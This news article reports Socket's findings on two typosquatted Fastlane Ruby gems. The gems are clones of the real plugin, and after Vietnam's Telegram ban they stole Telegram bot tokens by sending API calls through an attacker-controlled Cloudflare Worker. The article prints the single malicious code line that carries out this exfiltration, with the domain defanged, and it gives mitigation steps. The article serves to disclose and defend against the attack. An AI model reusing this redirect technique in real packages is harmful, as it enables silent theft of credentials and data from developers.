
Hackers Weaponize Ruby Gems to Steal Telegram Bot Tokens Post-Vietnam Ban

In a technically sophisticated supply chain attack, threat actors have released malicious Ruby gems designed specifically to steal Telegram bot tokens, hitting developers scrambling for Telegram workarounds after Vietnam’s nationwide ban on the messaging platform.

This campaign, uncovered by Socket’s Threat Research Team, highlights a growing trend: hackers quickly exploiting geopolitical events to push targeted malware to developers and their automated build environments.

Two fake Ruby gems—fastlane-plugin-telegram-proxy and fastlane-plugin-proxy_teleram—were published days after Vietnam ordered ISPs to block Telegram on May 21, 2025.

These gems cleverly masquerade as legitimate Fastlane plugins, tools widely used to automate mobile app deployment and notifications in CI/CD (Continuous Integration/Continuous Deployment) workflows.

How the Attack Works: A Subtle Code Change With Immense Impact

Technically, the attack is both subtle and insidious. The malicious gems are near-perfect clones of the popular fastlane-plugin-telegram project.

The attacker, using aliases “Bùi nam,” “buidanhnam,” and “si_mobile,” copied not just the code but also the README and public API, preserving expected behaviors and minimizing suspicion.

The only critical change was a single line of code:

Legitimate Gem – Uses Telegram API Directly

```ruby
uri = URI.parse("https://api.telegram.org/bot#{token}/sendMessage")
```

Malicious Gem – Silent Credential Exfiltration

```ruby
# Threat actor's proxy C2 endpoint, not Telegram
uri = URI.parse("https://rough-breeze-0c37[.]buidanhnam95[.]workers[.]dev/bot#{token}/sendMessage")
```

This swap redirects every API call—including messages, files, bot tokens, and chat IDs—through a Cloudflare Worker proxy fully controlled by the attacker.

Outwardly, the gem continues working as expected, passing users’ message requests to Telegram and returning legitimate responses. However, this relay surreptitiously captures and exfiltrates all sensitive data in transit.

Data exfiltrated includes:

  • Bot tokens (granting full programmatic access to Telegram bots)
  • Chat identifiers and message content
  • File attachments (potentially sensitive build logs, binaries, or credentials)
  • Optional proxy credentials, if unwittingly supplied by users

There are no additional checks or conditions in the code—no geofencing, sandbox detection, or locale-specific logic. This means the malware indiscriminately steals data from any environment where it is installed.

Technical Analysis: Typosquatting and Proxy Abuse

The threat actor employed a classic typosquatting strategy to maximize reach.

Both malicious gems used near-miss names—fastlane-plugin-telegram-proxy and fastlane-plugin-proxy_teleram—to blend into the RubyGems ecosystem, capitalizing on minor spelling mistakes or intuitive search queries by developers.

The attacker also forked the official plugin repository to lend credibility, using it as the homepage reference for their fake gems.

The attacker’s Cloudflare Worker endpoint claims not to log or modify bot tokens, but this assertion is unverifiable and misleading, as the source code is not published.

The relay’s technical opacity, combined with the silent data exfiltration, is a textbook example of supply chain compromise where a single, hard-to-spot code change opens a persistent backdoor.

Fastlane plugins frequently run within CI/CD services—handling release binaries, signing keys, and other environment secrets.

A stolen Telegram bot token can let attackers read deployment notifications, issue commands through the bot, or even leak sensitive post-build artifacts.

Because CI/CD systems are typically automated and trusted, malicious gems can compromise numerous production environments before detection.

Vietnam Telegram Ban and Global Supply Chain Risks

The campaign’s timing lines up with Vietnam’s May 2025 Telegram ban. The attacker’s Vietnamese-language aliases and the rapid release of “proxy” plugins suggest the operation was tailored to exploit local demand as developers sought workarounds to restore critical Telegram-based notifications and workflows.

However, the malware itself is not region-locked—no code restricts its behavior to Vietnam. Any developer, anywhere, who installs these gems is at risk of credential theft and supply chain compromise.

Recommendations and Mitigation

Security teams and developers should move fast:

  • Immediately audit for, and remove, fastlane-plugin-telegram-proxy and fastlane-plugin-proxy_teleram.
  • Revoke and rotate all Telegram bot tokens used with affected plugins.
  • Block outbound traffic to *.workers[.]dev unless required, and review logs for anomalous connections to the C2 domain.
  • Pin dependencies and scrutinize any “proxy” plugin updates, especially after regional platform bans or outages.
  • Use tools like Socket that automatically scan dependencies for malicious code changes and network redirects.

This incident underscores how attackers weaponize minor code edits in trusted package repositories to execute powerful credential theft campaigns.

As software supply chain attacks grow in frequency and sophistication, automated dependency security and vigilant developer awareness remain critical defenses.

Priya
